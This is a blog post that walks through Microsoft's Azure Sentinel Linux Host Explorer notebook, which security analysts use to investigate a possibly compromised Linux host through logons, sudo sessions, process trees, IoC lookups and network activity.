Explorer Notebook Series: The Linux Host Explorer

Azure Sentinel has integrated Azure Notebooks to allow security analysts to use Jupyter Notebooks to hunt and investigate threats. To learn more about using Jupyter Notebooks in security investigations check out the 3 part blog we released last year: Part 1, Part 2, Part 3.

To support usage of Jupyter Notebooks, Microsoft has produced a range of Explorer Notebooks to allow analysts to leverage the capabilities and power of Notebooks to investigate common entities including:

Linux Host

Windows Host

Domains & URL

IP Address

Process

Office 365 activity

Each of these notebooks is built using Microsoft Threat Intelligence Center’s (MSTIC) Python security tool library MSTICpy

This blog will look in detail at the Linux Host Explorer Notebook, explain what each section of the Notebook is intended to do and how it should be used. Further blogs covering the other explorer Notebooks will be released over time.

Note: These Notebooks are still under active development and will be updated over time with new features, therefore the Notebook presented in this blog may vary slightly from the current Notebook presented via the Azure Sentinel portal.

You can use the animated images in this document to help understand what is happening at each stage, however a better experience will be had if you run the Notebook yourself as you read through this blog.

Azure Notebooks Setup

Before using the Notebooks a number of setup steps are required to configure the Azure Notebooks environment, details of these steps can be found here: https://docs.microsoft.com/en-us/azure/sentinel/notebooks [1]

Once you have completed these setup steps you can launch the Entity Explorer – Linux Host Notebook. Note that all the Notebooks provided use Python 3.6 so please make sure your Azure Notebooks kernel is set to Python 3.6 once loaded. This can be done by selecting Kernel > Change kernel > Python 3.6.

If this is the first time running this Notebook the first thing you will need to do is ensure the required packages are installed, these packages are detailed in the Setup Cell at the end of the Notebook. You can navigate there via the Table of Contents or by scrolling to the end of the Notebook. Running the setup cell will install MSTICpy and any other required packages. It can take a number of minutes to download and install the required packages. Once complete make sure you restart the kernel the Notebook is running in to ensure the latest packages are used. This can be done using the menu button at the top of the Notebook.

Animated image of running the Notebook setup cells

Configuring the Explorer Notebook

Once you have run the required setup you can return to the top of the Notebook, here you will find details about the data sources used by the Notebook, what the Notebook is trying to achieve, and the Hunting Hypothesis. This hypothesis details the focus of the Notebook’s investigate features and guides path that it takes. For the Linux Explorer the hypothesis is as follows:

“Our broad initial hunting hypothesis is that a particular Linux host in our environment has been compromised, we will need to hunt from a range of different positions to validate or disprove this hypothesis.”

This is a broad hypothesis to ensure the Notebook remains relevant for a large number of investigations and threat hunts.

The next cell is titled Notebook Setup, this cell imports a number of packages to be used in the Notebook and sets some variables to be used later.

Animated image showing running the Notebook import cells

Authenticating to Azure Sentinel

Once the configuration is done we can connect to Azure Sentinel to collect the data needed for the Notebook’s investigation features. The connections are handled by MSTICpy’s data connector features. The two cells in the Explorer Notebook under ‘Get WorkspaceId and Authenticate to Log Analytics’ first get the details of the Azure Sentinel Workspace from configuration files (or if they are not present prompt the user to enter them). Details on these configuration files can be found here: https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html

Once the Workspace details are collected the next cell connects to the Workspace. During this connection the Notebook will load a feature called KQLMagic and you will be provided a device code and instructions to copy the code and authenticate. Clicking this button will open a new browser window where you can paste the provided code, after which you will be prompted to authenticate to the Workspace. You can authenticate with any account with which you would normally authenticate if accessing the Workspace via the Azure Portal. Once you have successfully connected the new browser window will automatically close and you can continue with the Notebook.

Animated image showing the running of the Notebook authentication cells

Scoping the Investigation

Once connected we need to select the host we are investigating and the timeframe we are investigating it in. To set the timescale run the cell under “Set Hunting Time Frame” this will provide you with a time slider that you can drag to set the timeframe you wish to investigate. If you need to adjust this timeframe later simply rerun this cell and change the slider.

The cell under the time slider will prompt you to enter the name of the host you wish to investigate, you can choose to enter a full name, partial name, or no name. If a full or partial name is entered the next cell will search across all Linux host data in your workspace in order to identify a match of that hostname. If a unique match is found that host is set as the focus for the investigation. Alternatively if multiple hosts are found matching the partial or full name these will be displayed for you to select which one you wish to focus on. If no host is entered all the hosts for which data is present in the timeframe set will be presented for you to choose from. Please note this Explorer Notebooks is designed to be focused on one host at a time therefore only a single host can be selected.

Animated image showing running of Notebook scoping cells

Host Overview

The next three cells provide an overview of the host. The first will collect a range of information about the host including details on OS, IP address, location, and installed services. This is intended to provide some context on the host being investigated, what role it might fulfill and where in the environment it resides. The granularity of this data will depend on whether the host is running in Azure and what extensions are enabled.

Following this are two cells providing details on alerts associated with the host in the last 30 days. The first cell will present these alerts in an interactive timeline view, this helps provide a visual representation of recent alert activity with the host and identifies potentially relevant alert patterns. You can pan and zoom on the timeline and hovering over a point will provide you with more details of the alert. Below this you are presented with a list view of all the alerts in the timeline, you can select an alert from the list to see the full details of the alert from Azure Sentinel. To view details of a different alert simply select another alert from the list. Before continuing with the Notebook select the alert you wish to focus on further, details of this alert will be used to scope elements of the investigation going forward.

Animated image showing running the Notebook host cells

From this point the Notebook provides a series if analytics and visualizations focused on different areas, you can choose to run these sections in order or jump to a specific area of interest. At various points in this Notebook menu items are provided to allow you to jump to specific sections (you can also use the Table of Contents at the top of the Notebook). Whilst all the sections can be run independently each cell within the section ties to previous cells and therefore cells within each section must be run in order. In addition all sections require you to complete the initial cells of authentication, scoping, and host overview.

Host Logons

Most Linux based intrusions involve attackers authenticating against infrastructure at some point, either as part of an initial compromise or later during lateral movement. Therefore the first analytics section in the Notebook is focused on Host Logons. Running this section will return a number of visualizations to help you understand the types of logons observed by the host within the time frame being investigated.

The first thing you will see when running cell under ‘Host Logon Events’ is another timeline. This timeline provides a breakdown of failed and successful logon attempts to the host. Overlaid on this is a marker showing the time of the alert you selected previously to provide a reference marker. As with the alert timeline you can scroll, pan, zoom and hover on items in the timeline in order to get more details. This timeline is particularly useful for identifying anomalous logon patterns such as brute force attempts.

Animated image of the host logons timeline

Below this are a number of graphs showing a breakdown of logon attempts by various factors including whether they were successful or not, what user account was involved, and what process was involved. Again, these help quickly identify any elements that may stand out due to volume or scarcity.

Finally, there is a map showing the location of the source IP address associated with each logon attempt. The location is based on IP geolocation and therefore the accuracy should not be considered 100% reliable. However, it provides a useful guide to where logon attempts are coming from and can easily highlight logons from anomalous locations. Red markers are used to show failed logons, and green ones to show successful logons. You can zoom and pan the map to view these events as you wish. Please note that if failed logons have occurred from the same location as successful ones the red marker will be behind the green maker meaning that it may not be visible.

Animated image showing the host logon graphs and map

Session Investigations

After looking at all logon events for the host we can choose to look closer at specific logon sessions. Running the cell under ‘Logon Sessions’ will return a list of all logon sessions, the session start time and end time, and the user involved. It will also show if the account is a root account on the host, if there was an alert associated with the host during that logon session, and the ratio of successful to failed logon events for that user account. If any of these elements are highlighted in yellow this indicates they may be logon sessions to focus on. Below the list of logons sessions is a selection box from which you can select the session you wish to focus further investigation on.

Once you have selected a session the next cell will return a range of details on host activity during that session. This includes a breakdown of cron activity, sudo commands run, and users added, removed, or modified. If there are multiple users on the host simultaneously this activity will relate to all logon sessions during that host during the session time window. This is due to the fact this Notebook relies on syslog data which means associating host activity with specific logon sessions is not possible in a reliable manner. At the bottom of this cell is another timeline providing an overview of all the activity detailed in the cell. This again provides a very useful visual reference as to the chronology of events and what relationship they may have to each other.

Animated image showing session selection cells running

The two cells at the end of the section return raw syslog data to allow for further investigation, the first focusses on syslog associated with sudo events and is filtered by the sudo command run. To change the displayed syslog simply select the command you wish to focus on and the table will update. The next cell does the same but for all syslog generated during the logon session and is broken down by facility.

Animated image showing cells outputting user session log data

Another useful datapoint for security analysts is process creation activity. Therefore the next cell produces a process tree for the analyst to interact with. The tree is created from auditd data, therefore you must have auditd enabled for this host and auditd data must be being collected by Azure Sentinel[2]. In addition due to the volume of data generated by auditd this cell can take some time to execute, if you are unsure if the cell is still executing or not you can use the kernel indicator in the top right of the Notebook window. If the indicator is a solid color this indicates that kernel is still executing.

Once complete the process tree displayed can be interacted with in the same way as the timelines seen previously, you can hover to get more details, scroll, pan, zoom , and use the sidebar to get a broader overview of the whole process tree.

Animated image showing running of the session process tree cells

Sudo session investigation

Syslog provides us only limited details of user activity on the host, the exception being when a user conducts actions with elevated privileges using sudo. Given the power of sudo this provides a useful insight into potential attacker activity, therefore the next cells provide an insight into sudo activity within the user logon session selected previously.

Given that multiple sudo sessions may occur during a single logon session the first cell allows you to select a particular sudo session to focus on, with the subsequent cell providing details of all syslog associated with this session. In addition, any Indicators of Compromise (IoCs) present in the syslog messages related to the sudo session will be extracted and looked up in Threat Intelligence feeds to help identify any sudo activity that may be malicious.

Note: The IoC extraction can occasionally generate false positives, this is due to the difficulty in identifying the difference between say a domain name and a file name e.g. google.sh is a valid domain but could also be the name of a shell script.

This cell provides details on a single sudo session at a time, to view details on another session select it from the list in the first cell and rerun the analysis cell.

Animated image showing sudo session selection cells running

User Activity

During the course of your investigation or hunting activity you may identify a specific user to focus on, the next section of the Notebook is designed to cater for this. You can run this section individually or as a follow on from the host session cells we have just covered.

This section has a broader timeframe than the session only section and instead covers all user activity in the timeframe set initially in the Notebook (under the “Select Host to Investigate” heading). The initial cell provides a list of users observed in the logs from which you can select a user to focus on. The follow on cell provides an overview of the users activity. This is similar to the host logon view but is focused on activity only from the selected user.

Animated image showing the user investigation selection cells and user logon timeline

There is also a summary of all sudo activity associated with that user. This section helps highlight specific user activity that may be anomalous and therefore warrant further investigation using the session investigation cells.

Animated image showing the user investigation graphs and map

The final cell of the section extracts IoCs from all syslog messages associated with the user and looks them up in threat intelligence feeds in order to identify any known malicious activity.

Application Activity

In a similar fashion as the User Activity section the Application Activity section allows you to focus your investigation on a specific application, this is particularly useful if you are searching for potential exploitation of a specific application or if you suspect an attacker may have run an application during their attack.

The first cell presents a list of applications for which logs are present that you can select from. The following cell presents an interactive graph of log volume from the application over time. This helps identify anomalous patterns or spikes over time. The first graph show the volume off all logs generated by the application, the second one shows only high priority messages generated (’emerg’, ‘alert’, ‘crit’, ‘err’, and ‘warning’). This separation can allow you to identify spikes in particularly interesting activity by removing the baseline of normal activity that might appear only as low priority messages.

Animated image showing the application investigation cells running

The other two cells in this section produce a process tree for the selected application. Due to the fact that process tree generation relies on auditd data, and the potential for large data volumes, there is a cell to change the timeframe to query to select a smaller window. The following cell that generates the process tree checks how many logs are being returned and if it surpasses 100,000 then it will prompt you to confirm if you wish to continue. Due to the high likelihood of a timeout with more than 100,000 lines of data it is strongly suggested that you adjust your timeframe if you are presented with this warning. If you need to query more data than this you can run this cell multiple times to generate process trees for different timeframes. The process tree returned is the same format as the one generated in the session section and can be interacted with in the same way.

Animated image showing application process tree cell running

The final cell will extract IoCs from all logs associated with the selected application, look up these IoCs in threat intelligence feeds and if a match is made then return that matched IoC and the syslog message it was present in.

Animated image showing application data IoC extraction cells running

Network Activity

The final analytical section of this Notebook focusses on Network activity. This section utilizes Azure Network Flow data, as well as identifying network activity present in syslog (such as SSH connection attempts). If Azure Flow Data is present the first cell will display a number of visualizations detailing network flow broken down by protocol and direction, if only syslog data is available these visualizations are not shown due to a lack of reliable data regarding flow direction or protocol.

The next cells allow you to focus your investigation on specific IP addresses, due to the volume of IP addresses often seen the first cell will resolve the ASN owner for each address and present a list of ASNs for you to select from. The cell after this will list all the IP addresses observed associated with that ASN, from which you can select a specific IP address to look at further. The final cell will then look up the selected IP address in threat intelligence, return details on any matches and also return details on all syslog messages containing the IP address to help you identify where malicious activity may have occured.

Animated image showing network analysis cells running

Summary

The Linux Explorer Notebook is a powerful tool for investigating a Linux host or hunting for threats. It can be used as an end to end investigation flow or used in sections as required based on the flow and focus of the investigation. However, it does not cover every conceivable scenario or environment, the real value of Notebooks is that this isn’t a limitation as you can customize these Notebooks to fit your needs, or you can create your own Notebook using elements from the Notebooks we have provided or entirely from scratch. There are virtually endless possibilities.

If you are looking to create your own Notebooks please make sure you check out MSTICpy as there is a good chance that it will contain features that will save you time and effort in creating what you need. Also, we are keen for any input, suggestions, issues or contributions to MSTICpy so please do feel free to contribute if you wish. In the same vein if you have Notebook that you would like to see included in the Azure Sentinel portal please let us know in the comments below or raise a issue on Github, we are always keen to get feedback and ideas from our customers.

[1] If you don’t want to use Azure Notebooks you can also download the Explorer Notebook and run it from a local Jupyter instance.

[2] https://msticpy.readthedocs.io/en/latest/data_acquisition/CollectingLinuxAuditLogs.html#configure-auditing-on-your-linux-vms